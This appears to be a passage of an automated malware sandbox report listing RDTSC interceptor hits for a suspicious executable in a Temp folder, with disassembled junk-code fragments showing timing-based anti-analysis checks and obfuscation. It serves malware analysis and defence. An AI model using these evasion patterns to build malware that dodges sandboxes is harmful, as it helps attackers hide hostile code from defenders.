Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61510F second address: 615113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 615267 second address: 61526C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 615438 second address: 61544E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jl 00007FF698BF10D2h 0x0000000e jl 00007FF698BF10CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 615D5B second address: 615D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 615D9F second address: 615DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 615DA3 second address: 615DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 615DA9 second address: 615DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698BF10D7h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 615DC4 second address: 615E02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e je 00007FF698E1E1A6h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007FF698E1E1B0h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 615FD7 second address: 615FF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6163AF second address: 6163B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6163B3 second address: 6163C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6163C1 second address: 6163C7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6163C7 second address: 61640C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF698BF10C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FF698BF10C8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D20D8h], ebx 0x0000002d xchg eax, ebx 0x0000002e pushad 0x0000002f jne 00007FF698BF10C8h 0x00000035 pushad 0x00000036 jl 00007FF698BF10C6h 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 617373 second address: 61737A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 618359 second address: 6183C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FF698BF10D9h 0x00000010 nop 0x00000011 mov esi, dword ptr [ebp+122D331Eh] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FF698BF10C8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 mov edi, ebx 0x00000035 push 00000000h 0x00000037 mov esi, dword ptr [ebp+122D2A2Bh] 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 push edx 0x00000042 pop edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6183C8 second address: 6183CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6183CD second address: 6183E0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF698BF10C8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6183E0 second address: 6183E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6183E4 second address: 6183EE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF698BF10C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 618C77 second address: 618C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FF698E1E1A6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 618C88 second address: 618C8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 619934 second address: 619939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61AF93 second address: 61B008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jnc 00007FF698BF10D2h 0x0000000c nop 0x0000000d mov esi, 6A448BFBh 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+122D1B6Eh], edi 0x0000001a push 00000000h 0x0000001c mov edi, 3D232361h 0x00000021 mov di, 1E5Ch 0x00000025 xchg eax, ebx 0x00000026 pushad 0x00000027 push esi 0x00000028 jmp 00007FF698BF10CAh 0x0000002d pop esi 0x0000002e pushad 0x0000002f jmp 00007FF698BF10D0h 0x00000034 jmp 00007FF698BF10D0h 0x00000039 popad 0x0000003a popad 0x0000003b push eax 0x0000003c pushad 0x0000003d jnl 00007FF698BF10C8h 0x00000043 pushad 0x00000044 jnl 00007FF698BF10C6h 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61B996 second address: 61B9B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF698E1E1B5h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61B9B3 second address: 61B9F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007FF698BF10D5h 0x0000000f mov edi, dword ptr [ebp+122D2D60h] 0x00000015 pop edi 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a xchg eax, ebx 0x0000001b push edx 0x0000001c jmp 00007FF698BF10CDh 0x00000021 pop edx 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61E6DF second address: 61E6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61A252 second address: 61A266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61AD5B second address: 61AD61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61A266 second address: 61A26C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61A26C second address: 61A270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61FD30 second address: 61FDD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF698BF10CDh 0x00000008 jmp 00007FF698BF10CEh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov ebx, 3D76F4A5h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FF698BF10C8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 mov edi, dword ptr [ebp+122D2827h] 0x0000003a mov edi, dword ptr [ebp+122D29FFh] 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FF698BF10C8h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000017h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c mov ebx, 15F357B7h 0x00000061 xchg eax, esi 0x00000062 jmp 00007FF698BF10CEh 0x00000067 push eax 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FF698BF10CEh 0x00000070 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61EEB5 second address: 61EEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61FDD0 second address: 61FDD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 620D8F second address: 620D93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 621D71 second address: 621D7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF698BF10C6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 620F63 second address: 620F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61FFA1 second address: 61FFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 620F67 second address: 620F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 621D7B second address: 621E1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FF698BF10D7h 0x00000011 nop 0x00000012 sub dword ptr [ebp+122D333Bh], eax 0x00000018 jmp 00007FF698BF10D7h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007FF698BF10C8h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 mov edi, ebx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007FF698BF10C8h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 0000001Dh 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 mov edi, dword ptr [ebp+122D2947h] 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 js 00007FF698BF10C6h 0x00000067 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61FFA5 second address: 61FFB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698E1E1ABh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 621E1A second address: 621E24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61FFB4 second address: 61FFB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61FFB8 second address: 61FFCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FF698BF10C8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 621F5E second address: 621F68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF698E1E1A6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 624D79 second address: 624D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 624D7D second address: 624D87 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF698E1E1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 624D87 second address: 624D8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 624D8C second address: 624E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698E1E1AFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FF698E1E1A8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push edi 0x0000002a pop edi 0x0000002b push 00000000h 0x0000002d mov edi, dword ptr [ebp+122D29EBh] 0x00000033 mov edi, dword ptr [ebp+124828C0h] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e call 00007FF698E1E1A8h 0x00000043 pop ecx 0x00000044 mov dword ptr [esp+04h], ecx 0x00000048 add dword ptr [esp+04h], 0000001Dh 0x00000050 inc ecx 0x00000051 push ecx 0x00000052 ret 0x00000053 pop ecx 0x00000054 ret 0x00000055 xor ebx, dword ptr [ebp+122D1A75h] 0x0000005b xchg eax, esi 0x0000005c push edx 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 622056 second address: 62205C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 62205C second address: 622062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 626E61 second address: 626E65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 626E65 second address: 626E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FF698E1E1B2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 626E75 second address: 626E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 627487 second address: 6274FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FF698E1E1A8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 or dword ptr [ebp+122D1A96h], ebx 0x00000028 push 00000000h 0x0000002a movzx ebx, ax 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007FF698E1E1A8h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 or ebx, 7034C256h 0x0000004f xchg eax, esi 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FF698E1E1B5h 0x00000057 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 623000 second address: 623006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 628414 second address: 62841B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 624F7C second address: 624F80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 624F80 second address: 625018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jg 00007FF698E1E1BCh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FF698E1E1A8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 push dword ptr fs:[00000000h] 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FF698E1E1A8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a mov dword ptr [ebp+12468B7Dh], esi 0x00000050 mov edi, dword ptr [ebp+122D21EAh] 0x00000056 mov dword ptr fs:[00000000h], esp 0x0000005d push ebx 0x0000005e pop ebx 0x0000005f mov eax, dword ptr [ebp+122D0125h] 0x00000065 push FFFFFFFFh 0x00000067 mov dword ptr [ebp+1245A90Dh], ecx 0x0000006d push eax 0x0000006e js 00007FF698E1E1B8h 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 625018 second address: 62501C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 62B511 second address: 62B515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 62B515 second address: 62B5A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF698BF10D4h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov ebx, dword ptr [ebp+12456932h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FF698BF10C8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 add bl, 0000005Ah 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007FF698BF10C8h 0x00000041 pop edx 0x00000042 mov dword ptr [esp+04h], edx 0x00000046 add dword ptr [esp+04h], 00000019h 0x0000004e inc edx 0x0000004f push edx 0x00000050 ret 0x00000051 pop edx 0x00000052 ret 0x00000053 mov di, 6A24h 0x00000057 mov dword ptr [ebp+1247F624h], edx 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 push edi 0x00000062 pop edi 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 62B5A0 second address: 62B5A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 62C661 second address: 62C667 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 627659 second address: 627660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 627660 second address: 627666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 62D6F2 second address: 62D6F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 62D6F6 second address: 62D6FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 62D6FC second address: 62D713 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 62D713 second address: 62D717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 62D717 second address: 62D71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 62D71D second address: 62D724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
